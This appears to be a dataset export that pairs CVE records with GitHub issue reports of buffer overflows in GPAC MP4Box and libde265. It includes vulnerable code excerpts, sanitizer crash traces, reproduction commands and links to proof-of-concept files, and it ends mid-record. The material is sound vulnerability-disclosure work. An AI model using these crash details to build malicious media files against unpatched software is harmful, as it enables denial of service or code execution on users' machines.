cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2022-47653
2023-01-05T16:15:09.350
GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in eac3_update_channels function of media_tools/av_parsers.c:9113
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2349" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2349" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/2349
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Description buffer overflow in eac3_update_channels function of media_tools/av_parsers.c:9113 ```c static void eac3_update_channels(GF_AC3Config *hdr) { u32 i; for (i=0; i<hdr->nb_streams; i++) { u32 nb_ch = ac3_mod_to_total_chans[hdr->streams[i].acmod]; // overflow if (hdr->streams[i].nb_dep_sub) { hdr->streams[i].chan_loc = eac3_chanmap_to_chan_loc(hdr->streams[i].chan_loc); nb_ch += gf_eac3_get_chan_loc_count(hdr->streams[i].chan_loc); } if (hdr->streams[i].lfon) nb_ch++; hdr->streams[i].channels = nb_ch; hdr->streams[i].surround_channels = ac3_mod_to_surround_chans[hdr->streams[i].acmod]; } } ``` # Version info latest version ``` MP4Box - GPAC version 2.1-DEV-rev593-g007bf61a0-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -add poc_bof7.swf ``` Crash reported by sanitizer ``` [iso file] Unknown box type dvbs in parent stsd Track Importing EAC-3 - SampleRate 32000 Num Channels 6 [AC3Dmx] 24 bytes unrecovered before sync word [AC3Dmx] 13 bytes unrecovered before sync word media_tools/av_parsers.c:9113:50: runtime error: index 8 out of bounds for type 'GF_AC3StreamInfo [8]' ``` # POC [poc_bof7.zip](https://github.com/gpac/gpac/files/10212046/poc_bof7.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
buffer overflow in eac3_update_channels function of media_tools/av_parsers.c:9113
https://api.github.com/repos/gpac/gpac/issues/2349/comments
0
2022-12-12T21:08:37Z
2022-12-13T09:18:38Z
https://github.com/gpac/gpac/issues/2349
1,492,772,918
2,349
4,587
CVE-2022-47654
2023-01-05T16:15:09.587
GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2350" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2350" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/2350
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Description buffer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261 ```c //sps_rep_format_idx = 0; if (multiLayerExtSpsFlag) { sps->update_rep_format_flag = gf_bs_read_int_log(bs, 1, "update_rep_format_flag"); if (sps->update_rep_format_flag) { sps->rep_format_idx = gf_bs_read_int_log(bs, 8, "rep_format_idx"); if (sps->rep_format_idx>15) { return -1; } } else { sps->rep_format_idx = vps->rep_format_idx[layer_id]; // overflow } ``` # Version info latest version ``` MP4Box - GPAC version 2.1-DEV-rev593-g007bf61a0-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -add poc_bof8.mov ``` Crash reported by sanitizer ``` [iso file] Unknown box type dvbs in parent stsd [HEVC] Error parsing NAL unit type 16 [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 32 [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 16 Track Importing HEVC - Width -10 Height -20316159 FPS 25000/1000 [HEVC] Error parsing NAL Unit 8 (size 0 type 0 frame 0 last POC 0) - skipping [HEVC] Error parsing NAL unit type 16 [HEVC] Error parsing NAL unit type 0 [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 32 [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 33 [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 34 [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Wrong number of layer sets in VPS 5 [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing Video Param Set [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 32 [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 33 [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 34 [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 34 [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] sorry, 11 layers in VPS but only 4 supported [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing Video Param Set media_tools/av_parsers.c:8261:45: runtime error: index 45 out of bounds for type 'u32 [16]' ``` # POC [poc_bof8.zip](https://github.com/gpac/gpac/files/10212064/poc_bof8.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
buffer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261
https://api.github.com/repos/gpac/gpac/issues/2350/comments
0
2022-12-12T21:13:33Z
2022-12-13T09:18:38Z
https://github.com/gpac/gpac/issues/2350
1,492,780,269
2,350
4,588
CVE-2022-47655
2023-01-05T16:15:09.803
Libde265 1.0.9 is vulnerable to Buffer Overflow in function void put_qpel_fallback<unsigned short>
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/367" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00020.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/367" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.9:*:*:*:*:*:*:*", "matchCriteriaId": "8186C657-3009-4756-B2AC-531BD7926074", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/367
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# Description stack-buffer-overflow (libde265/build/libde265/libde265.so+0x17d304) in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) # Version info ``` dec265 v1.0.9 -------------- usage: dec265 [options] videofile.bin The video file must be a raw bitstream, or a stream with NAL units (option -n). options: -q, --quiet do not show decoded image -t, --threads N set number of worker threads (0 - no threading) -c, --check-hash perform hash check -n, --nal input is a stream with 4-byte length prefixed NAL units -f, --frames N set number of frames to process -o, --output write YUV reconstruction -d, --dump dump headers -0, --noaccel do not use any accelerated code (SSE) -v, --verbose increase verbosity level (up to 3 times) -L, --no-logging disable logging -B, --write-bytestream FILENAME write raw bytestream (from NAL input) -m, --measure YUV compute PSNRs relative to reference YUV -T, --highest-TID select highest temporal sublayer to decode --disable-deblocking disable deblocking filter --disable-sao disable sample-adaptive offset filter -h, --help show help ``` # Reproduce ``` git clone https://github.com/strukturag/libde265.git cd libde265 mkdir build cd build cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address" make -j$(nproc) ./dec265/dec265 poc.bin ``` # ASAN ``` WARNING: coded parameter out of range WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: maximum number of reference pictures exceeded WARNING: faulty reference picture list WARNING: non-existing PPS referenced WARNING: CTB outside of image area (concealing stream error...) WARNING: non-existing PPS referenced WARNING: non-existing PPS referenced WARNING: non-existing PPS referenced WARNING: maximum number of reference pictures exceeded WARNING: CTB outside of image area (concealing stream error...) WARNING: non-existing PPS referenced ================================================================= ==3829==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffea52d35f at pc 0x7f8966bd5305 bp 0x7fffea52ac00 sp 0x7fffea52abf0 READ of size 2 at 0x7fffea52d35f thread T0 #0 0x7f8966bd5304 in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x17d304) #1 0x7f8966bd08c2 in put_qpel_1_0_fallback_16(short*, long, unsigned short const*, long, int, int, short*, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1788c2) #2 0x7f8966c0152e in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a952e) #3 0x7f8966c02c0f in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aac0f) #4 0x7f8966bf3a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b) #5 0x7f8966c00a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e) #6 0x7f8966c3dd2a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e5d2a) #7 0x7f8966c3f774 in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e7774) #8 0x7f8966c40762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762) #9 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3) #10 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3) #11 0x7f8966c405a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3) #12 0x7f8966c37d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49) #13 0x7f8966c40f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06) #14 0x7f8966c42c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f) #15 0x7f8966b95e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f) #16 0x7f8966b96673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673) #17 0x7f8966b95311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311) #18 0x7f8966b9505b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b) #19 0x7f8966b97be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6) #20 0x7f8966b9824c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c) #21 0x7f8966b7e3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2) #22 0x562ac9c989a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5) #23 0x7f8966526d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #24 0x7f8966526e3f in __libc_start_main_impl ../csu/libc-start.c:392 #25 0x562ac9c967c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4) Address 0x7fffea52d35f is located in stack of thread T0 at offset 9391 in frame #0 0x7f8966c02203 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa203) This frame has 2 object(s): [48, 9136) 'mcbuffer' (line 71) [9392, 15072) 'padbuf' (line 129) <== Memory access at offset 9391 partially underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x17d304) in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) Shadow bytes around the buggy address: 0x10007d49da10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007d49da20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007d49da30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007d49da40: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 0x10007d49da50: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 =>0x10007d49da60: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2[f2]00 00 00 00 0x10007d49da70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007d49da80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007d49da90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007d49daa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007d49dab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3829==ABORTING ``` # POC [poc.zip](https://github.com/strukturag/libde265/files/10244685/poc.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
Another stack-buffer-overflow in function void put_qpel_fallback<unsigned short>
https://api.github.com/repos/strukturag/libde265/issues/367/comments
3
2022-12-16T09:57:05Z
2023-01-24T16:21:23Z
https://github.com/strukturag/libde265/issues/367
1,499,914,232
367
4,589
CVE-2022-47656
2023-01-05T16:15:10.020
GPAC MP4box 2.1-DEV-rev617-g85ce76efd is vulnerable to Buffer Overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8273
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2353" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2353" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/2353
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Description buffer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8273 # Version info ``` MP4Box - GPAC version 2.1-DEV-rev617-g85ce76efd-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat poc_bof9.mp4 ``` Crash reported by sanitizer ``` [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set media_tools/av_parsers.c:8273:32: runtime error: index 159 out of bounds for type 'HEVC_RepFormat [16]' ``` # POC [poc_bof9.zip](https://github.com/gpac/gpac/files/10247605/poc_bof9.zip) # Impact Potentially causing DoS and RCE # Credit Xdchase
buffer overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8273
https://api.github.com/repos/gpac/gpac/issues/2353/comments
0
2022-12-16T17:03:35Z
2022-12-16T17:36:36Z
https://github.com/gpac/gpac/issues/2353
1,500,560,661
2,353
4,590
CVE-2022-47657
2023-01-05T16:15:10.233
GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2355" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2355" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/2355
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ # Description buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662 # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev644-g5c4df2a67-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat poc_bof12.mp4 ``` Crash reported by sanitizer ``` [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [Core] exp-golomb read failed, not enough bits in bitstream ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [Core] exp-golomb read failed, 